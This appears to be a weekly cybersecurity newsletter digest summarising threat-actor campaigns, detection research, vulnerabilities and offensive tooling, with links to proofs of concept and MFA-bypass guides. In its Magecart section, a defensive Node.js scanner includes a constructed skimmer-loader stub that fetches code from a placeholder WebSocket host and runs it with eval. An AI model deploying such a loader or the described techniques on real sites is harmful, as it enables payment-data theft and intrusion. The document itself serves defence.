Bluepurple Pulse: week ending February 26th
It is nearly spring in the northern hemisphere and, in the great words of Emmet, everything is awesome.
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week nothing overly standout; the tempo remains the same. The mass compromise since November of a vendor's backup software when exposed to the Internet, which appears to have gone undetected until now, is the most interesting (see reporting under ‘Exploitation’).
In the high-level this week:
Cyber-Attacks Must Be Reported in France to Authorities Within 72-Hours to Benefit from Insurance Coverage from April 24th - Good news but will lead to technical definitions and legal wrangling I suspect.
Hacks, Bots and Blackmail: How Secret Cyber Mercenaries Disrupt Elections - if true / accurate this is pretty explosive and Israel will likely be held to account for what it is allowing to happen from its shores.
Russian Businessman Found Guilty in $90 Million Hack-to-Trade Conspiracy - Defendant among five charged in global scheme that used non-public earnings reports stolen from U.S. computer networks to trade on dozens of stocks - stuff of Hollywood, long running case coming to conclusion.
Bahrain loses state immunity bid in dissidents' spyware lawsuit in UK - Bahrain cannot claim state immunity to block a lawsuit brought in Britain by two dissidents who say its government hacked their laptops with spyware, the High Court in London ruled on Wednesday.
FBI says it has 'contained' cyber incident on bureau's computer network - this should set a positive tone that everyone has incidents and we should talk about them.
Critical Infrastructure Protection: Time Frames to Complete DHS Efforts Would Help Sector Risk Management Agencies Implement Statutory Responsibilities - from the U.S. Government Accountability Office.
Social Engineering - A Coinbase Case Study - Coinbase recently experienced a cybersecurity attack that targeted one of its employees; executives should read this to appreciate the lengths threat actors will go to (also amazing transparency).
GoDaddy Inc. - Statement on recent website redirect issues - we discovered that an unauthorized third party had gained access to servers in our cPanel shared hosting environment and installed malware causing the intermittent redirection of customer websites - a long term and terrifying breach here. Talk about supply chains - this was potentially so many in one go.
German Constitutional Court strikes down predictive algorithms for policing - related there was also A Taxonomy of Trustworthiness for Artificial Intelligence.
Deadline for mandatory registration with Singapore SMS Sender ID Registry expired on 31 Jan 2023 - all non-registered SMS sender IDs [are] channeled to a sender ID with the header "Likely-SCAM" - this is only a good thing when we think about SMS phishing etc.
Pentagon and Microsoft Are Investigating Leak of Military Emails - an error that exposed at least a terabyte of military emails including personal information and conversations between officials - not a reason to not do cloud, but a reason to gain assurance you are doing it right. Not sure I agree with conflation that this was cloud specific.
Interoperable EU Risk Management Toolbox: This document presents the EU RM toolbox, a solution proposed by ENISA to address interoperability concerns related to the use of information security RM methods - clearly cyber is getting a little complicated and overlapping.
Man beats machine at Go in human victory over AI - shows AI/ML isn’t very good at spotting the ridiculous yet.
Reflections this week come from watching this documentary on 3D printed firearms and the strong sense of déjà vu with early hacker culture more broadly, i.e. counter culture, engineers, artists and libertarians etc. coming together. The implications for the future more broadly, as technologies that were once out of the reach of many no longer are, I find fascinating in and out of cyber.
On the interesting job/role front:
Cyber Threat Analyst, Cyber Threat Analysis Branch (CTAB) at NATO
Research or Senior Fellow – CyberAI at CSET at Georgetown
Have a lovely Thursday
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
Russia / Ukraine
UAC-0114 (Wintervivern) Campaign, Targeting Ukrainian and Polish Gov Entities
Reporting on a campaign from the end of last month involving quite rudimentary tradecraft.
On January 30, 2023, a phishing email targeting The Ministry of Foreign Affairs of Ukraine was sent to the corporate email address from outside the organization (sender mfa_it_secp[@]outlook[.]com)
The link hxxps://troadsecow[.]com/mfa[.]gov[.]ua was provided within the email. The link text indicates that it would lead to mfa[.]gov[.]ua, but it actually leads to troadsecow[.]com, where a malicious .bat file is placed.
Russian APT “Gamaredon” Exploits Hoaxshell to Target Ukrainian Organizations
Gianluca Tiepolo and Rémi Arsene provide insight into this Russian threat actor’s latest MO. Again phishing, again macros … as per last week, Content Disarm & Reconstruction is the answer here. When will the cloud email vendors offer it as a SaaS?
This analysis uncovers Gamaredon’s latest campaign, which targeted Ukrainian organizations by deploying Hoaxshell, a heavily obfuscated backdoor written in PowerShell
The attack vector consists of a spear-phishing email with minimal body content along with an attachment. Once the attachment is opened by the victim, the system will be compromised through the installation of a WebShell. Like in their prior operations, Gamaredon relies on the highly targeted distribution of weaponized documents. Their deceptive lures imitate official documents from real Ukrainian government organizations, meticulously crafted to deceive individuals who have legitimate reasons to interact with those organizations.
Several types of attachments were used to deliver malware. Some examples include .xlsx, .doc, .xlsm and .docm, of which .docm was the most prevalent.
Threat Actors Abuse Cloud Infrastructure in Targeted Telco Attacks
Aleksandar Milenkoski highlights a state backed threat actor who knows how to attack and utilize cloud in their operations. What will be interesting here is that the big cloud vendors should be able to track the development of the aforementioned capabilities.
A new threat cluster we track as WIP26 has been targeting telecommunication providers in the Middle East.
We assess it is likely that WIP26 is espionage-related.
WIP26 relies heavily on public Cloud infrastructure in an attempt to evade detection by making malicious traffic look legitimate.
WIP26 involves the use of backdoors, dubbed CMD365 and CMDEmber, which abuse Microsoft 365 Mail and Google Firebase services for C2 purposes.
WIP26 also involves the use of Microsoft Azure and Dropbox instances as data exfiltration and malware hosting sites.
Hydrochasma: Previously Unknown Group Targets Medical and Shipping Organizations in Asia
Some regional and sector specific targeting with … yes you guessed it … more phishing payloads.
Hydrochasma, the threat actor behind this campaign, has not been linked to any previously identified group, but appears to have a possible interest in industries that may be involved in COVID-19-related treatments or vaccines.
This activity has been ongoing since at least October 2022.
The infection vector used by Hydrochasma was most likely a phishing email. The first suspicious activity seen on machines is a lure document with a file name in the victim organization’s native language that appears to indicate it was an email attachment:
[TRANSLATED FROM THE ORIGINAL] Product Specification-Freight-Company Qualification Information wps-pdf Export.pdf.exe
Another lure document appears to be mimicking a resume:
[TRANSLATED FROM THE ORIGINAL] [REDACTED] University-Development Engineer.exe
Hangeul (HWP) malware using steganography: RedEyes (ScarCruft)
South Korean reporting on North Korean use of steganography (second stage payloads in images). In this instance JPG files held the latter stages.
[We] confirmed in January that the RedEyes attack group (also known as APT37, ScarCruft) was distributing malware through the Hangul Encapsulated PostScript (EPS) vulnerability (CVE-2017-8291). In this report, the latest domestic activities of the RedEyes group are shared.
RambleOn Android Malware - attributed to potentially being APT37
Ovi Liber provides insight into North Korean Android mobile capability. The initial access vector is social engineering. This has been attributed specifically to APT37/Kimsuky and what is of note is the modular Android framework deployed.
A journalist in South Korea recently received a malicious APK file, suggested by an anonymous tipper to be installed on the journalist’s phone.
It is found that the APK file and its behavior after installation contain critically malicious functionalities, including the ability to read and leak the target’s contact list, SMS, voice call content, location and others from the time of compromise of the target.
The malicious APK file, named RambleOn in this report, contains unique characteristics: 1) using the infrastructure of pCloud and Yandex, 2) usage of the FCM service for C&C communication.
https://interlab.or.kr/archives/2567
SideWinder targeting Malaysia's KEMENTERIAN DALAM NEGERI MINISTRY OF HOME AFFAIRS in phishing attacks
twitter.com/BaoshengbinCumt/status/1626132020773679106?s=20
Molted skin: APT SideWinder 2021 campaign that targeted over 60 companies in the Asia-Pacific
An Indian threat actor’s 2021 campaign documented in glorious detail. The scale and breadth of the targets is interesting given their historical regional focus. This is a little dated but it points to a statement of intent on behalf of the threat actor.
https://www.group-ib.com/media-center/press-releases/sidewinder-apt-report/
APT SideCopy Targeting Indian Government Entities
Changing gear, we then have reporting on Pakistani operations in India. This reporting is around a new implant called ReverseRAT. Special mention once again for this vendor as they preclude copying and pasting from their reporting.
https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/
Frebniis: New Malware Abuses Microsoft IIS Feature to Establish Backdoor
Circumstantially, IIS tradecraft and Taiwan as a target give me a working hypothesis that this might be China, but we don’t know. Anyway, whoever it is, they have just had quite a novel IIS implant burnt.
The malware, dubbed Frebniis (Backdoor.Frebniis), was used by a currently unknown threat actor against targets in Taiwan.
The technique used by Frebniis involves injecting malicious code into the memory of a DLL file (iisfreb.dll) related to an IIS feature used to troubleshoot and analyze failed web page requests. This allows the malware to stealthily monitor all HTTP requests and recognize specially formatted HTTP requests sent by the attacker, allowing for remote code execution. In order to use this technique, an attacker needs to gain access to the Windows system running the IIS server by some other means. In this particular case, it is unclear how this access was achieved.
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/frebniis-malware-iis
Earth Kitsune Delivers New WhiskerSpy Backdoor via Watering Hole Attack
Joseph C Chen and Jaromir Horejsi provide reporting on North Korean operations using watering holes. The point of note here is that browser exploits appear to have become scarcer for them, so they have evolved into using social engineering to get their implants deployed.
We discovered a new backdoor which we have attributed to the advanced persistent threat actor known as Earth Kitsune, which we have covered before. Since 2019, Earth Kitsune has been distributing variants of self-developed backdoors to targets, primarily individuals who are interested in North Korea.
In many of the cases we have investigated in the past, the threat actor used watering hole tactics by compromising websites related to North Korea and injecting browser exploits into them. In the latest activity we analyze here, Earth Kitsune used a similar tactic, but instead of using browser exploits, employed social engineering.
https://www.trendmicro.com/en_us/research/23/b/earth-kitsune-delivers-new-whiskerspy-backdoor.html
Invitation to a Secret Event: Uncovering Earth Yako’s Campaigns
Hara Hiroaki, Yuka Higashi and Masaoki Shoji provide some Japanese and Taiwanese regional reporting on an actor who started in 2021 and is currently unattributed, although again, given the victimology and the highly targeted nature, there are obvious suspects. Again uses phishing!
Since January 2022, we have been observing Earth Yako as it targets researchers in the academe and research think tanks in Japan. We also observed a small number of attacks that appear to have targeted organizations in Taiwan.
In this campaign, Earth Yako uses a spearphishing link for initial access. The URL in the spearphishing mail downloads the compressed (.zip) or disc image (.iso) file containing a malicious shortcut file (.lnk) to download another payload. We observed several spearphishing emails masquerading as an invitation for private or public meeting-like events, which leads to downloading the malware onto the target system.
ALTOUFAN TEAM Targets the Middle East
This reporting is noteworthy due to the apparent breach of the social security system in Bahrain and an attempt to cause financial loss to the government by a threat actor unhappy with normalizing relationships between two countries. This is a real CNI attack outside of the telecommunications, energy and traditional finance sectors.
On February 13, 2023, the Threat Actor (TA) group ALTOUFAN TEAM on Telegram announced a campaign against Bahraini and Israeli websites to protest the normalization of relations between the two countries.
The TAs claimed they would carry out a hack to modify the pension wages of Bahrainis registered on the Social Insurance Organization “before dawn”.
At approximately 11:54 PM, the group shared a video as proof of compromise, claiming to have fully compromised the systems and servers of the Social Insurance Organization of Bahrain to raise the base wages of 4,000 insured and registered Bahraini citizens.
https://blog.cyble.com/2023/02/16/altoufan-team-targets-the-middle-east/
These aren’t the apps you’re looking for: fake installers targeting Southeast and East Asia
Matías Porolli and Fernando Tavella detail further malvertising campaigns being thrown at Chinese victims. You can see from the below that the campaigns have been going on for more than nine months. The threat actor is unknown, with a novel trick to entice deployment.
The attackers purchased advertisements to position their malicious websites in the “sponsored” section of Google search results. We reported these ads to Google and they were promptly removed.
The websites and installers downloaded from them are mostly in Chinese and in some cases falsely offer Chinese language versions of software that is not available in China.
We observed victims mostly in Southeast and East Asia, suggesting that the advertisements were targeting that region.
We observed these attacks between August 2022 and January 2023, but according to our telemetry previous versions of the installers have been used since at least May 2022.
None of the malware or network infrastructure used in this campaign has been matched to known activities of any named groups, so for now we have not attributed this activity to any known group.
https://www.welivesecurity.com/2023/02/16/these-arent-apps-youre-looking-for-fake-installers/
Operation Silent Watch: Desktop Surveillance in Azerbaijan and Armenia
This reporting is of note due to the use of polyglot files again. The initial access tradecraft is however standard phishing using file extensions from the 90s.
The newest version of OxtaRAT is a polyglot file, which combines compiled AutoIT script and an image. The tool capabilities include searching for and exfiltrating files from the infected machine, recording the video from the web camera and desktop, remotely controlling the compromised machine with TightVNC, installing a web shell, performing port scanning, and more.
Compared to previous campaigns of this threat actor, the latest campaign from November 2022 presents changes in the infection chain, improved operational security, and new functionality to improve the ways to steal the victim’s data.
The threat actors behind these attacks have been targeting human rights organizations, dissidents, and independent media in Azerbaijan for several years. This is the first time there is a clear indication of these attackers using OxtaRAT against Armenian targets and targeting corporate environments.
Enigma Stealer Targets Cryptocurrency Industry with Fake Jobs
Aliakbar Zahravi and Peter Girnus outline a criminal campaign aimed at the cryptocurrency industry. It should be noted that Microsoft have now mitigated the techniques used by this threat actor to nobble Defender, namely the ability to sandbox Defender. Specifically, protected processes and token trust levels have been implemented in 22H2 and 23H2.
We recently found an active campaign that uses a fake employment pretext targeting Eastern Europeans in the cryptocurrency industry to install an information stealer. In this campaign, the suspected Russian threat actors use several highly obfuscated and under-development custom loaders to infect those involved in the cryptocurrency industry with the Enigma Stealer (detected as TrojanSpy.MSIL.ENIGMASTEALER.YXDBC), a modified version of the Stealerium information stealer. In addition to these loaders, the attacker also exploits CVE-2015-2291, an Intel driver vulnerability, to load a malicious driver designed to reduce the token integrity of Microsoft Defender.
Threat actors are using fake Emsisoft code-signing certificates to disguise their attacks
Senan Conrad provides insight into what feels like a concerted effort based on intelligence of the target organization.
We recently observed an incident in which a fake code-signing certificate supposedly belonging to Emsisoft was used in an attempt to obfuscate a targeted attack against one of our customers. The organization in question used our products and the attacker’s aim was to get that organization to allow an application the threat actor installed and intended to use by making its detection appear to be a false-positive.
Magecart Attack Disguised as Google Tag Manager
Roman Lvovsky documents the evolution in obfuscation tradecraft used by this criminal group. The IoCs are strong and should provide a good methodology for cyber defense / site reliability engineers to instrument checks for their estates using Burp Suite or similar.
The recent attack aimed to steal sensitive information from visitors on checkout pages and forms. The attackers were able to inject a malicious inline JavaScript code into the targeted websites by exploiting a vulnerability. The skimmer used techniques such as impersonating a legitimate third-party vendor, like Google Tag Manager, and hiding the malicious code through Base64 encoding.
In this instance, the inline snippet serves only as a loader and not as the actual attack code. The loader includes a condition that triggers the attack only on checkout pages, thereby allowing the skimmer to operate discreetly and load the full malicious code only on targeted, sensitive pages that are relevant to the attack.
Impersonate a known vendor code snippet like Google Tag Manager
Use Base64 encoding to hide any indicators of the attacker like URLs and domains
Use WebSockets for all the communication between the browser and the C2 — pulling the attack code and exfiltrating the data
Execute the attack code with “eval” to make the script look like an organic first-party script
Use obfuscation techniques to make it difficult for researchers to understand the code
Inject fake forms to collect data before redirecting to legitimate third-party payment service pages
https://www.akamai.com/blog/security/magecart-attack-disguised-as-google-tag-manager
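As an added illustration (my example, not Akamai's code) of how a site owner could instrument the checks Roman's indicators suggest: a Node.js script that scans a page's inline scripts for the traits listed above, flagging snippets that claim to be Google Tag Manager but also decode Base64, open WebSockets or call eval, and decoding any Base64 literal to surface hidden URLs. The sample HTML, the loader stub and the placeholder C2 address are constructed for this example.

```javascript
// Added example, not Akamai's code: heuristic scan of a page's inline <script>
// blocks for the loader traits listed in the write-up. A snippet that looks
// like Google Tag Manager but also decodes Base64, opens a WebSocket or calls
// eval() is flagged, and Base64 literals are decoded to surface hidden URLs.
// All sample HTML, the loader stub and the C2 address below are constructed.

const GTM_MARKERS = [/googletagmanager\.com\/gtm\.js/i, /\bdataLayer\b/, /GTM-[A-Z0-9]+/];

// Traits taken from the Akamai write-up; each is only a weak signal on its own.
const SUSPICIOUS = [
  { name: 'base64-decode',  re: /\batob\s*\(/ },
  { name: 'eval',           re: /\beval\s*\(/ },
  { name: 'websocket',      re: /new\s+WebSocket\s*\(/ },
  { name: 'checkout-gate',  re: /checkout|payment|billing/i },
  { name: 'base64-literal', re: /["'`][A-Za-z0-9+/]{24,}={0,2}["'`]/ },
];

// Return the bodies of inline <script> elements (external src= scripts skipped).
function extractInlineScripts(html) {
  const out = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (!/\bsrc\s*=/i.test(m[1])) out.push(m[2]);
  }
  return out;
}

// Decode quoted Base64 literals and keep those that yield printable ASCII,
// which is how an encoded C2 URL or domain would surface.
function decodeBase64Literals(src) {
  const found = [];
  const re = /["'`]([A-Za-z0-9+/]{24,}={0,2})["'`]/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    const text = Buffer.from(m[1], 'base64').toString('utf8');
    if (/^[\x20-\x7e]+$/.test(text)) found.push(text);
  }
  return found;
}

function analyseScript(src) {
  const looksLikeGtm = GTM_MARKERS.some((r) => r.test(src));
  const hits = SUSPICIOUS.filter((s) => s.re.test(src)).map((s) => s.name);
  const decoded = decodeBase64Literals(src);
  // A genuine GTM bootstrap has none of the traits; a loader masquerading as
  // GTM normally shows several, so require at least two to keep noise down.
  const verdict = looksLikeGtm && hits.length >= 2 ? 'suspicious' : 'benign';
  return { looksLikeGtm, hits, decoded, verdict };
}

function scanHtml(html) {
  return extractInlineScripts(html).map(analyseScript);
}

// --- constructed sample page -----------------------------------------------
// The standard GTM bootstrap (container id is a placeholder).
const GENUINE_GTM = `(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-XXXXXX');`;

// A loader stub showing the listed traits (placeholder address, does nothing real).
const PLACEHOLDER_C2 = 'wss://c2.example.invalid/socket';
const FAKE_LOADER = `/* Google Tag Manager */
(function(){var dl=window.dataLayer||[];if(!/checkout/i.test(location.href))return;
var u=atob('${Buffer.from(PLACEHOLDER_C2).toString('base64')}');
var ws=new WebSocket(u);ws.onmessage=function(e){eval(e.data);};})();`;

const SAMPLE_HTML = `<html><head>
<script>${GENUINE_GTM}</script>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXXXX"></script>
<script>${FAKE_LOADER}</script>
</head><body></body></html>`;

// Report one entry per inline script: the genuine bootstrap is benign, the
// loader stub is flagged with its decoded placeholder C2 address.
console.log(JSON.stringify(scanHtml(SAMPLE_HTML), null, 2));
```

Run this against a saved copy of a checkout page (or feed it page sources collected by a Burp Suite extension); the decoded literals are the domains to feed into your blocklist and alerting.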
New BPFDoor sample
From China with love.
https://www.virustotal.com/gui/file/aa477897c51958aee57d854a531684551c99c9f992fc8e70963f2f93c962bff8
Cut off the magic hand that endangers China's data security
Included for completeness as the Chinese response is as interesting as the activity.
The ATW organization was established in June 2021, and in October it began to carry out activities on the "Array Forum" (RaidForums). Although the account signature is set to "National State Organization", in fact this is a loose network organization formed by people who work as programmers and network engineers in Europe and North America.
Since its inception, the ATW organization has expressed a clear anti-China stance. It publicly stated that "it will mainly publish government data leak posts aimed at China, North Korea and other countries", blatantly supporting "Taiwan independence", agitating for "Hong Kong independence", and hyping up "human rights issues" in Xinjiang.
Discovery
How we find and understand the latent compromises within our environments.
Velociraptor detection content
Matthew Green provides a work aid for those of you using Velociraptor.
A repository to share publicly available bulk Velociraptor detection content in an easy to consume way.
Current artifacts include:
Windows.Detection.Applications
Windows.Detection.BinaryRename
Windows.Detection.Evtx
Windows.Detection.HijackLibsEnv
Windows.Detection.HijackLibsMFT
Windows.Detection.MFT
Windows.Detection.NamedPipes
Windows.Detection.PowershellPSReadline
Windows.Detection.Webhistory
Windows.Detection.ZoneIdentifier
Server.StartHunts
https://github.com/mgreen27/DetectRaptor
Anomaly Detection in the Open World: Normality Shift Detection, Explanation, and Adaptation
Anomaly detection is held up as a holy grail but in reality is hard to get value from in practice in a lot of cases due to inherent noise/chaos. This work out of China is interesting for two reasons. First is the improvements made. Second is the size of the team involved - Dongqi Han, Zhiliang Wang, Wenqi Chen, Kai Wang, Rui Yu, Su Wang, Han Zhang, Zhihua Wang, Minghui Jin, Jiahai Yang, Xingang Shi and Xia Yin - I do get a sense that Western academic teams are underweight comparatively.
In this work, we are the first to explore the normality shift for deep learning-based anomaly detection in security applications, and propose OWAD, a general framework to detect, explain, and adapt to normality shift in practice. In particular, OWAD outperforms prior work by detecting shift in an unsupervised fashion, reducing the overhead of manual labeling, and providing better adaptation performance through distribution-level tackling. We demonstrate the effectiveness of OWAD through several realistic experiments on three security-related anomaly detection applications with long-term practical data. Results show that OWAD can provide better adaptation performance of normality shift with less labeling overhead. We provide case studies to analyze the normality shift and provide operational recommendations for security applications. We also conduct an initial real-world deployment on a SCADA security system
https://www.ndss-symposium.org/wp-content/uploads/2023/02/ndss2023_f830_paper.pdf
Zero-Shot Anomaly Detection without Foundation Models
Not cyber specific but Aodong Li, Chen Qiu, Marius Kloft, Padhraic Smyth, Maja Rudolph and Stephan Mandt provide some incremental performance improvements which likely could be applied to our domain.
Our solution relies on training an off-the-shelf anomaly detector (such as a deep SVDD) on a set of inter-related data distributions in combination with batch normalization. This simple recipe, batch normalization plus meta-training, is a highly effective and versatile tool. Our results demonstrate the first zero-shot anomaly detection results for tabular data and SOTA zero-shot AD results for image data from specialized domains.
https://arxiv.org/pdf/2302.07849.pdf
Defence
How we proactively defend our environments.
That Escalated Quickly: An ML Framework for Alert Prioritization
Ben Gelman, Salma Taoufiq, Tamás Vörös and Konstantin Berlin present some work which on the face of it has impressive performance returns. It will be interesting to see, if/when this approach gets experimented with in the real world, whether similar is seen in practice.
[We] present That Escalated Quickly (TEQ), a machine learning framework that reduces alert fatigue with minimal changes to SOC workflows by predicting alert-level and incident-level actionability. On real-world data, the system is able to reduce the time it takes to respond to actionable incidents by 22.9%, suppress 54% of false positives with a 95.1% detection rate, and reduce the number of alerts an analyst needs to investigate within singular incidents by 14%.
https://arxiv.org/abs/2302.06648
MAAD-AF - Attack Framework for testing M365 and AAD
Arpan Sarkar and David Brooks give us another cloud attack testing framework.
MAAD-AF is an open-source cloud attack tool developed for testing security of Microsoft 365 & Azure AD environments through adversary emulation. MAAD-AF provides security practitioners easy to use attack modules to exploit configurations across different M365/AzureAD cloud-based tools & services.
MAAD-AF is designed to make cloud security testing simple, fast and effective. Through its virtually no-setup requirement and easy to use interactive attack modules, security teams can test their security controls, detection and response capabilities easily and swiftly.
https://github.com/vectra-ai-research/MAAD-AF
Convert Sentinel Analytics Rules with PowerShell
Fabian Bader provides a work aid to all Sentinel teams out there 🫶
If you have worked with Microsoft Sentinel you will, at one point, have stumbled over two different file formats for Analytics Rules: YAML and ARM.
I created a PowerShell module: SentinelARConverter
It has only two functions: Convert-SentinelARArmToYaml and Convert-SentinelARYamlToArm
https://cloudbrothers.info/convert-sentinel-analytics-rules/
Tip of the CAP: Getting started with (Microsoft) Conditional Access Policies
Zac Fink gives pragmatic advice on how to reduce exposure to stolen credentials through conditional access policies.
https://redcanary.com/blog/conditional-access-policies/
Vulnerability
Our attack surface.
Fortiguard - FortiNAC - External Control of File Name or Path in keyUpload scriptlet
Resulting in remote code execution (see later for the exploit).
https://www.fortiguard.com/psirt/FG-IR-22-300
Account Takeover Vulnerability in a Popular Package Affecting 1000+ orgs
Supply chain threats in software once again demonstrated. A domain name associated with one of the maintainers of an npm package with over 3.5 million weekly downloads had expired and is available for registration.
The package can be taken over by recovering an expired domain name for one of its maintainers and resetting the password.
Even though npm has a mechanism that restricts user accounts to only one active email per account, the package’s associated GitHub account is recoverable.
With access to the GitHub account, a CI/CD automation token (used in publishing packages automatically) can be extracted from the project’s pipeline and used to publish new malicious packages on behalf of the maintainer account.
Offense
Attack capability, techniques and trade-craft.
MFA Phishing using noVNC and AWS
We’ve discussed this type of capability before - but here is the step by step how-to guide for all threat actors out there. Get those detection tradecraft trigger fingers ready.
https://medium.com/@psychsecurity/mfa-phishing-using-novnc-and-aws-ebc781b4d093
Bypassing Okta MFA Credential Provider for Windows
A tip of where you might want to ensure some integrity checking occurs of your configuration to detect such modifications.
This is a POST exploitation technique. This is mostly for when you have already gained admin on the system via other means and want to be able to RDP without needing MFA.
Biggest difference between Duo and Okta is that Okta does not have fail open as the default value, making it less likely of a configuration. It also does not have “RDP Only” as the default, making the console bypass also less likely to be successful.
With that said, if you do have administrator level shell access, it is quite simple to disable.
https://www.n00py.io/2023/02/bypassing-okta-mfa-credential-provider-for-windows/
NimPlant: A light-weight first-stage C2 implant written in Nim
Cas van Cooten gives us another implant framework to contend with.
https://github.com/chvancooten/NimPlant
Direct Kernel Object Manipulation (DKOM) Attacks on ETW Providers
Ruben Boonen highlights the importance of passing positive noise through a system to ensure your telemetry isn’t blind.
[We] analyze how attackers, with elevated privileges, can use their access to stage Windows Kernel post-exploitation capabilities. Over the last few years, public accounts have increasingly shown that less sophisticated attackers are using this technique to achieve their objectives. Specifically, in this post, we will evaluate how Kernel post-exploitation can be used to blind ETW sensors and tie that back to malware samples identified in-the-wild last year.
https://securityintelligence.com/posts/direct-kernel-object-manipulation-attacks-etw-providers/
ntqueueapcthreadex-ntdll-gadget-injection: A novel way of using NtQueueApcThreadEx by abusing the ApcRoutine and SystemArgument[0-3] parameters
Lloyd Davies makes EDR weep some more.
This novel way of using NtQueueApcThreadEx by abusing the ApcRoutine and SystemArgument[0-3] parameters by passing a random "pop r32; ret" gadget can be used for stealthy code injection. Within this PoC, the gadget in this case is picked randomly from ntdll.dll's memory region which matches a specific pattern. This means the gadget returns into the shellcode.
https://github.com/LloydLabs/ntqueueapcthreadex-ntdll-gadget-injection
Exploitation
What is being exploited.
CVE-2022-39952: Proof of Concept
Brace brace brace for the above Fortinet vulnerability.
https://github.com/horizon3ai/CVE-2022-39952
From Backup to Backdoor: Exploitation of CVE-2022-36537 in R1Soft Server Backup Manager
Stuff of nightmares right here, exploitation started four months ago and no one noticed.
During a recent incident response case, we found traces of an adversary leveraging ConnectWise R1Soft Server Backup Manager software (hereinafter: R1Soft server software). The adversary used it as an initial point of access and as a platform to control downstream systems connected via the R1Soft Backup Agent.
The adversary exploited the R1Soft server software via CVE-2022-36537 [1] [2], which is a vulnerability in the ZK Java Framework that R1Soft Server Backup Manager utilises.
Further research by us indicates that world-wide exploitation of R1Soft server software started around the end of November 2022.
Mirai Variant V3G4 Targets IoT Devices
Chao Lei, Zhibin Zhang, Cecilia Hu and Aveek Das give a sense of scale of the weaponization of known vulnerabilities in the IoT space by this botnet.
[We] observed a Mirai variant called V3G4, which was leveraging several vulnerabilities to spread itself. The vulnerabilities exploited include the following:
CVE-2012-4869: FreePBX Elastix Remote Command Execution Vulnerability
Gitorious Remote Command Execution Vulnerability
CVE-2014-9727: FRITZ!Box Webcam Remote Command Execution Vulnerability
Mitel AWC Remote Command Execution Vulnerability
CVE-2017-5173: Geutebruck IP Cameras Remote Command Execution Vulnerability
CVE-2019-15107: Webmin Command Injection Vulnerability
Spree Commerce Arbitrary Command Execution Vulnerability
FLIR Thermal Camera Remote Command Execution Vulnerability
CVE-2020-8515: DrayTek Vigor Remote Command Execution Vulnerability
CVE-2020-15415: DrayTek Vigor Remote Command Injection Vulnerability
CVE-2022-36267: Airspan AirSpot Remote Command Execution Vulnerability
CVE-2022-26134: Atlassian Confluence Remote Code Execution Vulnerability
CVE-2022-4257: C-Data Web Management System Command Injection Vulnerability
https://unit42.paloaltonetworks.com/mirai-variant-v3g4/
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
Nothing this week
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
More than Half of All Phishing Sites Impersonate Financials in Q4
A Side-Channel Attack on a Hardware Implementation of CRYSTALS-Kyber
This newsletter is produced by BinaryFirefly; it is via BinaryFirefly that I support a hand-picked set of organisations across investment, strategy and capability in the domain of cyber.
For sponsorship enquiries regarding Bluepurple or anything else contact hello@binaryfirefly.com.